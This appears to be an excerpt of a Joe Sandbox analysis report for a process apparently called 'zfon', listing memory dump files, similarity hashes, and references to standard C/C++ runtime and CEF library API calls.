                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: calloc$___lc_locale_name_funcfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsInfoLocaleThrow___lc_codepage_func___mb_cur_max_func__crt__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                            • API String ID: 3654265320-3573081731
                                                                                                                                                                            • Opcode ID: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                                                                                            • Instruction ID: b502abffeb7376e0ecd6b169febec17e53600d31f57a2429cfedcf8194a57a9b
                                                                                                                                                                            • Opcode Fuzzy Hash: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C51D3BAA04B8186E768CF30D4900AE7BA0FB55FA4B146375CFA953795DF39E442CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF79CFBBF9C
                                                                                                                                                                            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF79CFBBFE7
                                                                                                                                                                            • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF79CFBC00D
                                                                                                                                                                            • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF79CFBC02E
                                                                                                                                                                            • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF79CFBC07B
                                                                                                                                                                            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF79CFBC082
                                                                                                                                                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF79CFBC08F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1492985063-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: {for
                                                                                                                                                                            • API String ID: 2943138195-864106941
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42418
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42426
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42438
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B4246C
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42476
                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42484
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B42A30,?,?,00000000,00007FFBC1B45826), ref: 00007FFBC1B42494
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$memset$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 700262077-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::atol
                                                                                                                                                                            • String ID: `template-parameter$void
                                                                                                                                                                            • API String ID: 2130343216-4057429177
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB4191
                                                                                                                                                                            • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB41B8
                                                                                                                                                                            • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB41FD
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFB4350), ref: 00007FF79CFB425B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                                                                            • API String ID: 3790025958-4289949731
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                            • API String ID: 1405650943-2211150622
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: char $int $long $short $unsigned
                                                                                                                                                                            • API String ID: 2943138195-3894466517
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFC8B20: new.LIBCMT ref: 00007FF79CFC8B37
                                                                                                                                                                              • Part of subcall function 00007FF79CFC8B20: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC8B46
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC34F4
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC3694
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC3860
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC3870
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC3880
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC388D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856544966-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: fgetc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2807381905-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
• Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2704743706-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2704743706-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_movxXp_mulx$Xp_setw_errnoldexpmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2704743706-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
• Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741236498-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __acrt_iob_funccalloc$Mtx_unlock_beginthreadexabortfputcfputs
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3995598257-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Once$ExecuteInit__crtterminate$ErrorExceptionLastSystem_errorSystem_error::_Throw_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3077141932-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow__std_exception_copy$std::invalid_argument::invalid_argument$std::regex_error::regex_error
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2225372811-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 490008815-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFC4224), ref: 00007FF79CFC987F
                                                                                                                                                                            • ?_Xbad_alloc@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFC4224), ref: 00007FF79CFC98A0
                                                                                                                                                                            • new.LIBCMT ref: 00007FF79CFC98AA
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFC4224), ref: 00007FF79CFC98B7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                                                                                            • Instruction ID: cbf7d0dfcb94eeac28a7c844e2e1ff500770308cfda461cf0fb0f319d646ab5a
                                                                                                                                                                            • Opcode Fuzzy Hash: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A018665F4A60351FD68F776B589338A1A2AF45B60FC00A34C52D863D4FE1C65858222
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                                                                                            • Instruction ID: 326c34323acd5390236e555f7d4c25a8c4b364c157dd9a54aa6f8922d93f32db
                                                                                                                                                                            • Opcode Fuzzy Hash: df32d05ea09cbf875a063a74e2004c604787f01abbfeaa2e241b8ecd85f65cee
                                                                                                                                                                            • Instruction Fuzzy Hash: 72016275F4A50352ED28F3749549338A1E2AF557A1FC10634C52E027D8FF5C64868321
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 96c7a756f207ce34266089aa0f1babb719ca79f35fc216322b591ea9cc0b8032
                                                                                                                                                                            • Instruction ID: 54af649afc0afbfb0689f12b886c289a4f53dc86dae74abe6ba968aab6cb5923
                                                                                                                                                                            • Opcode Fuzzy Hash: 96c7a756f207ce34266089aa0f1babb719ca79f35fc216322b591ea9cc0b8032
                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF08165E0A60350FD38B378A85A338E1B6AF45B70FD00735C67D013E8FE2C64868230
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: b922828b7e2684afbcf6d79d91bb5d9672ec89368d0f2cf6d04bfcc6100c8038
